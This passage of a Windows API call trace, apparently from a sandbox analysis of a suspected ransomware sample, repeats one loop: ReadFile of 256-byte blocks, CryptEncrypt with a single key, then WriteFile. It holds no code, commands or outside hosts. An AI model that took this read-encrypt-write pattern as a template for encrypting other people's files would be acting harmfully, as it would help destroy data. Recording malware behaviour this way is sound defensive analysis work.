lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.433] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.433] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.433] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.434] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.434] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.434] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.434] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.434] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.434] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.434] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.434] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.434] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.434] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.434] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.434] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.434] GetLastError () returned 0x0 [0167.434] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.435] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.435] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.435] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.435] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.436] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.436] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.436] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.436] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.436] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.436] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.436] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.436] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.436] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.436] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.436] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.436] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.436] GetLastError () returned 0x0 [0167.436] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.437] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.437] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.437] GetLastError () returned 0x0 [0167.437] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.438] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.438] GetLastError () returned 0x0 [0167.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.438] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.438] GetLastError () returned 0x0 [0167.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.438] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.438] GetLastError () returned 0x0 [0167.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.438] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.438] GetLastError () returned 0x0 [0167.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.438] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.438] CryptEncrypt (in: hKey=0x9ad6b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.438] GetLastError () returned 0x0 [0167.438] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, 